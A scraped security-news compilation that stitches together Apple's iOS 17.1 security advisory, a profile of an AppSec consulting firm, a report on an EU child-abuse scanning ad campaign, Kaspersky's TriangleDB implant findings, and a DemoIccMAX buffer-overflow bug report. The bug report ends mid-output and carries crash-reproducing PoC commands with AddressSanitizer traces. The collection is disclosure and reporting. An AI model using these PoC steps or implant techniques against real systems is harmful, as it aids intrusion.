Apple Security Advisory 10-25-2023-1 - iOS 17.1 and iPadOS 17.1 addresses bypass, code execution, and use-after-free vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-10-25-2023-1 iOS 17.1 and iPadOS 17.1iOS 17.1 and iPadOS 17.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT213982.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.ContactsAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: A privacy issue was addressed with improved private dataredaction for log entries.CVE-2023-41072: Wojciech Regula of SecuRing (wojciechregula.blog) andCsaba Fitzl (@theevilbit) of Offensive SecurityCVE-2023-42857: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)CoreAnimationAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to cause a denial-of-serviceDescription: The issue was addressed with improved memory handling.CVE-2023-40449: Tomi Tokics (@tomitokics) of iTomsn0wFind MyAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to read sensitive location informationDescription: The issue was addressed with improved handling of caches.CVE-2023-40413: Adam M.ImageIOAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing an image may result in disclosure of process memoryDescription: The issue was addressed with improved memory handling.CVE-2023-40416: JZIOTextEncryptionFamilyAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2023-40423: an anonymous researcherKernelAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An attacker that has already achieved kernel code execution maybe able to bypass kernel memory mitigationsDescription: The issue was addressed with improved memory handling.CVE-2023-42849: Linus Henze of Pinauten GmbH (pinauten.de <http://pinauten.de/>)Mail DraftsAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Hide My Email may be deactivated unexpectedlyDescription: An inconsistent user interface issue was addressed withimproved state management.CVE-2023-40408: Grzegorz RiegelmDNSResponderAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A device may be passively tracked by its Wi-Fi MAC addressDescription: This issue was addressed by removing the vulnerable code.CVE-2023-42846: Talal Haj Bakry and Tommy Mysk of Mysk Inc. @mysk_coPasskeysAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An attacker may be able to access passkeys withoutauthenticationDescription: A logic issue was addressed with improved checks.CVE-2023-42847: an anonymous researcherPhotosAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Photos in the Hidden Photos Album may be viewed withoutauthenticationDescription: An authentication issue was addressed with improved statemanagement.CVE-2023-42845: Bistrit DahlaPro ResAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2023-42841: Mingxuan Yang (@PPPF00L), happybabywu and Guang Gong of360 Vulnerability Research InstituteSiriAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An attacker with physical access may be able to use Siri toaccess sensitive user dataDescription: This issue was addressed by restricting options offered ona locked device.CVE-2023-41982: Bistrit DahlaCVE-2023-41997: Bistrit DahlaCVE-2023-41988: Bistrit DahlaStatus BarAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A device may persistently fail to lockDescription: The issue was addressed with improved UI handling.CVE-2023-40445: Ting Ding, James Mancz, Omar Shibli, an anonymousresearcher, Lorenzo Cavallaro, and Harry LewandowskiWeatherAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: A privacy issue was addressed with improved private dataredaction for log entries.CVE-2023-41254: Cristian Dinca of "Tudor Vianu" National High School ofComputer Science, RomaniaWebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing web content may lead to arbitrary code executionDescription: The issue was addressed with improved memory handling.WebKit Bugzilla: 259836CVE-2023-40447: 이준성(Junsung Lee) of Cross RepublicWebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing web content may lead to arbitrary code executionDescription: A use-after-free issue was addressed with improved memorymanagement.WebKit Bugzilla: 259890CVE-2023-41976: 이준성(Junsung Lee)WebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing web content may lead to arbitrary code executionDescription: A logic issue was addressed with improved checks.WebKit Bugzilla: 260173CVE-2023-42852: an anonymous researcherWebKit Process ModelAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing web content may lead to a denial-of-serviceDescription: The issue was addressed with improved memory handling.WebKit Bugzilla: 260757CVE-2023-41983: 이준성(Junsung Lee)Additional recognitionlibarchiveWe would like to acknowledge Bahaa Naamneh for their assistance.libxml2We would like to acknowledge OSS-Fuzz, Ned Williamson of Google ProjectZero for their assistance.Power ManagerWe would like to acknowledge Xia0o0o0o (@Nyaaaaa_ovo) of University ofCalifornia, San Diego for their assistance.VoiceOverWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) of LakshmiNarain College Of Technology Bhopal India for their assistance.WebKitWe would like to acknowledge an anonymous researcher for theirassistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 17.1 and iPadOS 17.1".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmU5YlsACgkQX+5d1TXaIvo6xBAAz5wnchUVfj3YbZf3KoadrXFmkWVjtU6sme4ZgN2+gsX+oF1Cunxvx3N2lGG1dldfG+gmJ3nmtp9/hBCIMvBt5Bus3NdD2nuJ7IbLbP2YuUOrMX3FDPNB8UPE84d6wZ7B3VVKVxeUsaZzuDlMCvGySyaVelBTxEdDx6RjsHlOe0LWwqoQJ4rrUOO9wdBogsDpD4JNt++6UarA1f2+OC1mePdiI9e1t6OI+q92IOZu3/cGDda/rFoL/TpY+iC1n9qkyyEOj3anfFi6fjybQQK/XPYccv4iWdP2xi5nqKDQ95nYlnf2LmI6gMOWJutciLyLzqSI3eHY4cL99/NLpMI7UkgBRNHsNwH9d0mJlVyjIBtevJbWKDJl9iSH3LeZmeMV1x3WQ9JshGmDYvXWJ9cyppKHRsu5BLeMpzis6dmv3FD+sBbI7Or9REKahyYP0N8YfTGBcFoTa4r0tx1r51+Dy7uUbuMHDxRbXkTLRReEzmyXyxMC+HcEzLUAq0YWuGwR3kZ9x+mlBKBxj+/4dltzKWg8lxOTC733RR78/vsgbf1M3cFpibsubH0LhC9k7RXnV9AYexsEoasFtHuIQQPErTVJqWYYKi6knM34fn64reitK8224Cy6SXybo55ZsTVV+XRmuzppiOjMFXupcTUTozdmcyXwMaMKSJYAbkOXtLQ==iliY-----END PGP SIGNATURE-----

Apple Security Advisory 10-25-2023-1

Zatik takes a fractional approach to AppSec leadership to help small firms access the expertise they need to build secure-by-design software.

One of the fundamental principles of secure-by-design software development is that organizations need to account for security concerns right out of the gate. It's built into the way the applications are designed, architected, and coded. The trouble for small companies that build software is that it can be really hard for them to access and pay for the kind of application security expertise necessary to fold that kind of accountability into the engineering or DevOps process. And so small companies build and ship their software — oftentimes innovative applications upon which their whole business model is based — without much consideration for security.

By the time a startup has "grown up" and built its business big enough to feasibly hire some application security professionals, secure-by-design has already gone out the window. The software stack has already accumulated a ton of security technical debt. That new AppSec team is behind the eight ball before they even start. And without expensive refactoring, oftentimes all they can do is bolt on security controls or apply Band-Aids to security problems that may run very deep.

It's an age-old problem, and one that's simply not practical to get all preachy about to small business owners or small dev teams.

"Experienced application security people are in short supply, and they're getting hoovered up by the big companies, by the Microsofts, Amazons, Apples, and Googles of the world, and if you are a smaller company, you're just not competing on that playing field," explains Kymberlee Price, who has led product security and AppSec teams, worked as a security researcher, and run red team and incident response operations for the likes of Microsoft, Amazon, and Bugcrowd.

Price has been around the block enough to recognize that not only are best-in-class product security pros and security-aware developers still the "unicorns" of the software engineering market, but also that most small businesses aren't big enough to even have enough work to keep one of them busy for very long.

"They don't need a unicorn full time. They need a unicorn maybe for a quarter to set some strategy, and then they need 10% of a unicorn for the rest of the year," she says.

**Sharing the Unicorns**

This is the underlying problem Price hopes to alleviate with her new consulting firm, Zatik. Together with co-founder Jon Callas, another security luminary known for founding PGP and Silent Circle, Price hopes to level the software security playing field for startups and small businesses. Zatik is a fractional security consulting firm that helps companies tap into that small percentage of unicorn-level AppSec expertise that they need to get a security program up and running. It's built in the same mold as a virtual CISO (vCISOs), with a slightly different focus.

"We love virtual CISOs. But they're frequently enterprise-focused and compliance-focused. And we're more looking at, how do you build your product securely by design, the DevOps pipeline, CI/CD, security controls, and things like that," Price explains. "So it's a really nice complement to that fractional model."

For some companies, if they're early enough in their arc, they may need the full package of building out an entire cybersecurity program — something she and Callas are equipped to help them navigate.

"Our sweet spot really is securing the developer experience, but we can help them look at their tech stack, make some recommendations, and make some introductions to other partners," says Price.

She says that she and Callas currently run the company themselves, but they plan on adding more staff as Zatik scales and also leaning on a network of partners to provide additional expertise in areas as necessary for their clients.

"I mean, I can't help you secure your product if you have no employee access control," Price says. "So we wouldn't turn our nose up at other areas."

Ultimately, the goal is to help smaller companies develop that security-by-design ethos from the outset. Price sees that not only as a great business opportunity, but a way to move the needle on security across the tech world.

"One of the things I love about the kind of small companies we're talking to is we're getting in early in their maturity cycle," she says. "So as they're growing, they're growing with a secure-by-design platform where the engineers they're hiring and managing understand that this is 'just how we do it.' Of course we have branch protection, of course we do these things because it was there from day one, versus the security team showing up later and demanding that they have to change things."

Do Small Companies Need Fractional AppSec Teams Akin to Virtual CISOs?

An EU government body is pushing a proposal to combat child sexual abuse material that has significant privacy implications. Its lead advocate is making things even messier.

Danny Mekić, an Amsterdam-based PhD researcher, was studying a proposed European law meant to combat child sexual abuse when he came across a rather odd discovery. All of a sudden, he started seeing ads on X, formerly Twitter, that featured young girls and sinister-looking men against a dark background, set to an eerie soundtrack. The advertisements, which displayed stats from a survey about child sexual abuse and online privacy, were paid for by the European Commission.

Mekić thought the videos were unusual for a governmental organization and decided to delve deeper. The survey findings highlighted in the videos suggested that a majority of EU citizens would support the scanning of all their digital communications. Following closer inspection, he discovered that these findings appeared biased and otherwise flawed. The survey results were gathered by misleading the participants, he claims, which in turn may have misled the recipients of the ads; the conclusion that EU citizens were fine with greater surveillance couldn’t be drawn from the survey, and the findings clashed with those of independent polls.

The micro-targeting ad campaign categorized recipients based on religious beliefs and political orientation criteria—all considered sensitive information under EU data protection laws—and also appeared to violate X’s terms of service. Mekić found that the ads were meant to be seen by select targets, such as top ministry officials, while they were concealed from people interested in Julian Assange, Brexit, EU corruption, Eurosceptic politicians (Marine Le Pen, Nigel Farage, Viktor Orban, Giorgia Meloni), the German right-wing populist party AfD, and “anti-Christians.”

Mekić then found out that the ads, which have garnered at least 4 million views, were only displayed in seven EU countries: the Netherlands, Sweden, Belgium, Finland, Slovenia, Portugal, and the Czech Republic.

At first, Mekić could not figure out the country selection, he tells WIRED, until he realized that neither the timing nor the purpose of the campaign was accidental. The Commission’s campaign was launched a day after the EU Council met without securing sufficient support for the proposed legislation Mekić had been studying, and the targeted counties were those that did not support the draft.

The legislation in question is a controversial proposal by the EU Commission known as Chat Control or CSA Regulation (CSAR) that would obligate digital platforms to detect and report any trace of child sexual abuse material on their systems and in their users’ private chats, covering platforms such as Signal, WhatsApp, and other messaging apps. Digital rights activists, privacy regulators, and national governments have strongly criticized the proposal, which the European data protection supervisor (EDSR) Wojciech Wiewiorowski said would amount to “crossing the Rubicon” in terms of mass surveillance of EU citizens.

“I think it is fair to say that this was an attempt to influence public opinion in countries critical of the indiscriminate scanning of all digital communications of all EU citizens and to put pressure on the negotiators of these countries to agree to the legislation,” says Mekić. “If the European Commission, a significant institution in the EU, can engage in targeted disinformation campaigns, it sets a dangerous precedent.”

The Dutch researcher’s find adds to the controversy surrounding the Commission, which has recently come under fire due to allegations that certain AI firms and advocacy groups with significant financial backing have had a notable level of influence over the shaping of CSAR—allegations that lead Commissioner Ylva Johansson countered, asserting that she had committed no wrongdoing. Johansson’s office did not respond to WIRED’s request for comment.

“There’s an inexplicable obsession with this file \[CSAR\] in the Commission. I don’t know where that comes from,” EU lawmaker Sophie in ’t Veld told WIRED after she submitted a priority parliamentary question on the case. “Why are they doing \[the campaign\] while the legislative process is still ongoing?”

As the pressure on the Commission has been mounting, Johansson lashed out against the influential civil rights nonprofit European Digital Rights, one of the strongest critics of the legislation and a defender of end-to-end encryption. She referred to its funding from Apple, suggesting EDRi was laundering the company’s talking points. “Apple was accused of moving encryption keys to China, which critics say could endanger customer data. Yet no one asks if these are strange bedfellows, no one assumes Apple is drafting EDRI’s speaking points,” she noted in a Commission blog on October 13.

Referring to EDRi’s independence and transparent funding processes, senior policy adviser Ella Jakubowska tells WIRED: “Attempts to delegitimize civil society suggest a worrying effort to silence critical voices, in line with broader trends of shrinking civic space. When both the content and the process regarding this law are so troubling, we need to ask how the European Commission allowed it to reach this point.”

Adding to the Commission’s conspicuous ad campaign, Mekić’s discovery came on the same day the European Commission formally sent X a request for information under the Digital Services Act, the sweeping EU digital disinformation law, following indications of “spreading of illegal content and disinformation” on the platform.

“The Commission’s ability to enforce the DSA could be undermined if their own services are willing to flagrantly disregard these rules. Whilst the DSA is supposed to rein in the power of big tech, the CSA Regulation would force digital service providers to become a privatized police force in all our online chats, emails, and messages,” says Jakubowska. “It’s hard to see how these regimes can coexist or more broadly, how the EU can uphold fundamental human rights if it passes a law which could violate the essence of certain rights.”

The votes in the European Parliament and EU Council are still pending. “The Commission seems to forget its own role here: It is not a legislator. It only has the prerogative of proposing legislation,” says in ’t Veld. “It has no business interfering in the internal debate, neither in the Council nor in the European Parliament. The Commission is completely out of bounds here.”

Commenting on the negotiations, the outcome of which remains uncertain, EDRi’s Jakubowska observed that “it is reassuring to see that many lawmakers are alert to just how terrifying it would be for the EU to endorse a proposal that in essence amounts to distributed spyware on everyone’s devices.”

As far as the contested ad campaign is concerned, Wiewiorowski, the European data protection supervisor, initiated a pre-investigation requesting from the Commission “information related to the described use of microtargeted ads,” with a response due by the end of last week. Wiewiorowski’s office declined WIRED’s request to comment on the potential for a formal investigation.

Ironically, Danny Mekić now believes he’s been shadowbanned by X, alongside other journalists, scientists, and researchers who have been critical of CSAR. X did not respond to WIRED’s request for comment.

“I haven’t received any response from X,” Mekić says. “Steps are currently being taken to find out what caused this and whether it was an algorithmic or human decision or whether it was done at the request of so-called trusted flaggers—such as, for example, the European Commission itself, or one of the organizations involved in the CSAR lobby.”

A Controversial Plan to Scan Private Messages for Child Abuse Meets Fresh Scandal

The TriangleDB implant used to target Apple iOS devices packs in at least four different modules to record microphone, extract iCloud Keychain, steal data from SQLite databases used by various apps, and estimate the victim's location.
The findings come from Kaspersky, which detailed the great lengths the adversary behind the campaign, dubbed Operation Triangulation, went to conceal and cover up

The TriangleDB implant used to target Apple iOS devices packs in at least four different modules to record microphone, extract iCloud Keychain, steal data from SQLite databases used by various apps, and estimate the victim's location.

The findings come from Kaspersky, which detailed the great lengths the adversary behind the campaign, dubbed **Operation Triangulation**, went to conceal and cover up its tracks while clandestinely hoovering sensitive information from the compromised devices.

The sophisticated attack first came to light in June 2023, when it emerged that iOS have been targeted by a zero-click exploit weaponizing then zero-day security flaws (CVE-2023-32434 and CVE-2023-32435) that leverages the iMessage platform to deliver a malicious attachment that can gain complete control over the device and user data.

The scale and the identity of the threat actor is presently unknown, although Kaspersky itself became one of the targets at the start of the year, prompting it to investigate the various components of what it said in a fully-featured advanced persistent threat (APT) platform.

The core of the attack framework constitutes a backdoor called TriangleDB that's deployed after the attackers obtain root privileges on the target iOS device by exploiting CVE-2023-32434, a kernel vulnerability that could be abused to execute arbitrary code.

Now, according to the Russian cybersecurity company, the deployment of the implant is preceded by two validator stages, namely JavaScript Validator and Binary Validator, that are executed to determine if the target device is not associated with a research environment.

"These validators collect various information about the victim device and send it to the C2 server," Kaspersky researchers Georgy Kucherin, Leonid Bezvershenko, and Valentin Pashkov said in a technical report published Monday.

"This information is then used to assess if the iPhone or iPad to be implanted with TriangleDB could be a research device. By performing such checks, attackers can make sure that their zero-day exploits and the implant do not get burned."

By way of background: The starting point of the attack chain is an invisible iMessage attachment that a victim receives, which triggers a zero-click exploit chain designed to stealthily open a unique URL containing obfuscated JavaScript as well as an encrypted payload.

The payload is the JavaScript validator that, besides conducting various arithmetic operations and checking for the presence of Media Source API and WebAssembly, performs a browser fingerprinting technique called canvas fingerprinting by drawing a yellow triangle on a pink background with WebGL and calculating its checksum.

The information collected following this step is transmitted to a remote server in order to receive, in return, an unknown next-stage malware. Also delivered after a series of undetermined steps is a Binary Validator, a Mach-O binary file that carries out the below operations -

*   Remove crash logs from the /private/var/mobile/Library/Logs/CrashReporter directory to erase traces of possible exploitation
*   Delete evidence of the malicious iMessage attachment sent from 36 different attacker-controlled Gmail, Outlook, and Yahoo email addresses
*   Obtain a list of processes running on the device and the network interfaces
*   Check if the target device is jailbroken
*   Turn on personalized ad tracking
*   Gather information about the device (username, phone number, IMEI, and Apple ID), and
*   Retrieve a list of installed apps

"What is interesting about these actions is that the validator implements them both for iOS and macOS systems," the researchers said, adding the results of the aforementioned actions are encrypted and exfiltrated to a command-and-control (C2) server to fetch the TriangleDB implant.

One of the very first steps taken by the backdoor is to establish communication with the C2 server and send a heartbeat, subsequently receiving commands that delete crash log and database files to cover up the forensic trail and hamper analysis.

Also issued to the implant are instructions to periodically exfiltrate files from the /private/var/tmp directory that contain location, iCloud Keychain, SQL-related, and microphone-recorded data.

A notable feature of the microphone-recording module is its ability to suspend recording when the device screen is turned on, indicating the threat actor's intention to fly under the radar.

What's more, the location-monitoring module is orchestrated to use GSM data, such as mobile country code (MCC), mobile network code (MNC), and location area code (LAC), to triangulate the victim's location when GPS data is not available.

"The adversary behind Triangulation took great care to avoid detection," the researchers said. "The attackers also showed a great understanding of iOS internals, as they used private undocumented APIs in the course of the attack."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Operation Triangulation: Experts Uncover Deeper Insights into iOS Zero-Day Attacks

In International Color Consortium DemoIccMAX 79ecb74, there is an out-of-bounds read in the CIccPRMG::GetChroma function in IccProfLib/IccPrmg.cpp in libSampleICC.a.

**Stack Buffer & Global Overflow Patches by @h02332 for DemoICCMax****Summary**

There is a stack buffer overflow at the icFixXml function and there is a global buffer overflow in the CIccPRMG::GetChroma function.

**Bug 1**

There is a stack buffer overflow at the icFixXml function, which is defined in IccUtilXml.cpp at line 330. The overflow occurs on a variable named 'fix', which is defined in IccTagXml.cpp at line 337.

    Error Details:
    Error Type: Stack buffer overflow.
    File: IccUtilXml.cpp
    Function: icFixXml
    Line: 330
    Variable Affected: 'fix' (defined in IccTagXml.cpp at line 337)
    Memory Affected: Address 0x7ff7b129ad20
    

**PoC**

     ./iccToXml ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc new.xml
    iccToXml(12862,0x7ff851846e80) malloc: nano zone abandoned due to inability to reserve vm space.
    
    ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ff7b129ad20 at pc 0x00010f569ed9 bp 0x7ff7b129ab70 sp 0x7ff7b129ab68
    WRITE of size 1 at 0x7ff7b129ad20 thread T0
        #0 0x10f569ed8 in icFixXml(char*, char const*) IccUtilXml.cpp:330
        #1 0x10f4ff381 in CIccTagXmlTextDescription::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) IccTagXml.cpp:353
        #2 0x10f4eb22a in CIccProfileXml::ToXmlWithBlanks(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) IccProfileXml.cpp:264
        #3 0x10f4e632c in CIccProfileXml::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccProfileXml.cpp:79
        #4 0x10ec6821f in main IccToXml.cpp:38
        #5 0x7ff80dee53a5 in start+0x795 (dyld:x86_64+0xfffffffffff5c3a5)
    
    Address 0x7ff7b129ad20 is located in stack of thread T0 at offset 288 in frame
        #0 0x10f4fed5f in CIccTagXmlTextDescription::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) IccTagXml.cpp:336
    
      This frame has 7 object(s):
        [32, 288) 'fix' (line 337) <== Memory access at offset 288 overflows this variable
        [352, 608) 'buf' (line 338)
        [672, 928) 'data' (line 339)
        [992, 1016) 'datastr' (line 340)
        [1056, 1080) 'agg.tmp'
        [1120, 1144) 'ref.tmp' (line 351)
        [1184, 1208) 'ref.tmp45' (line 360)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow IccUtilXml.cpp:330 in icFixXml(char*, char const*)
    Shadow bytes around the buggy address:
      0x7ff7b129aa80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ab00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ab80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ac00: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ac80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x7ff7b129ad00: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 00 00 00 00
      0x7ff7b129ad80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ae00: 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2
      0x7ff7b129ae80: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129af00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129af80: 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 f2
    

**Expected Output**

    ./iccToXml ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc new.xml
    XML successfully created
    

**Bug 2**

There is a global buffer overflow, that can potentially be exploited to execute arbitrary code or lead to undefined behavior.

    Error Details:
    Error Type: Global buffer overflow.
    File: IccPrmg.cpp
    Function: CIccPRMG::GetChroma
    Line: 163
    Affected Variable: 'icPRMG_Chroma' defined in IccPrmg.cpp
    Memory Affected: Address 0x000103847bf0
    

**PoC**

    ./iccRoundTrip ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc
    iccRoundTrip(12888,0x7ff851846e80) malloc: nano zone abandoned due to inability to reserve vm space.
    =================================================================
    ==12888==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000103847bf0 at pc 0x00010365ce45 bp 0x7ff7bd5f1a80 sp 0x7ff7bd5f1a78
    READ of size 4 at 0x000103847bf0 thread T0
        #0 0x10365ce44 in CIccPRMG::GetChroma(float, float) IccPrmg.cpp:163
        #1 0x10365cefd in CIccPRMG::InGamut(float, float, float) IccPrmg.cpp:170
        #2 0x10365d151 in CIccPRMG::InGamut(float*) IccPrmg.cpp:183
        #3 0x10365de40 in CIccPRMG::EvaluateProfile(CIccProfile*, icRenderingIntent, icXformInterp, bool) IccPrmg.cpp:240
        #4 0x10365ea4e in CIccPRMG::EvaluateProfile(char const*, icRenderingIntent, icXformInterp, bool) IccPrmg.cpp:288
        #5 0x102913176 in main iccRoundTrip.cpp:177
        #6 0x7ff80dee53a5 in start+0x795 (dyld:x86_64+0xfffffffffff5c3a5)
    
    0x000103847bf0 is located 0 bytes after global variable 'icPRMG_Chroma' defined in '/Users/xss/Downloads/DemoIccMAX-master/IccProfLib/IccPrmg.cpp' (0x103847060) of size 2960
    SUMMARY: AddressSanitizer: global-buffer-overflow IccPrmg.cpp:163 in CIccPRMG::GetChroma(float, float)
    Shadow bytes around the buggy address:
      0x000103847900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x000103847b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]f9
      0x000103847c00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847c80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847d00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847d80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847e00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
    

**Expected Output**

    ./iccRoundTrip ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc
    iccRoundTrip(29379,0x7ff851846e80) malloc: nano zone abandoned due to inability to reserve vm space.
    Profile:          '/Users/xss/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc'
    Rendering Intent: Relative Colorimetric
    Specified Gamut:  Not Specified
    
    Round Trip 1
    ------------
    Min DeltaE:        0.00
    Mean DeltaE:       1.46
    Max DeltaE:        7.05
    
    Max L, a, b:   32.481213, 7.808893, 7.558380
    
    Round Trip 2
    ------------
    Min DeltaE:        0.00
    Mean DeltaE:       0.64
    Max DeltaE:        2.81
    
    Max L, a, b:   39.559242, 7.503039, -29.157310
    
    PRMG Interoperability - Round Trip Results
    ------------------------------------------------------
    DE <= 1.0 (   25388):  12.6%
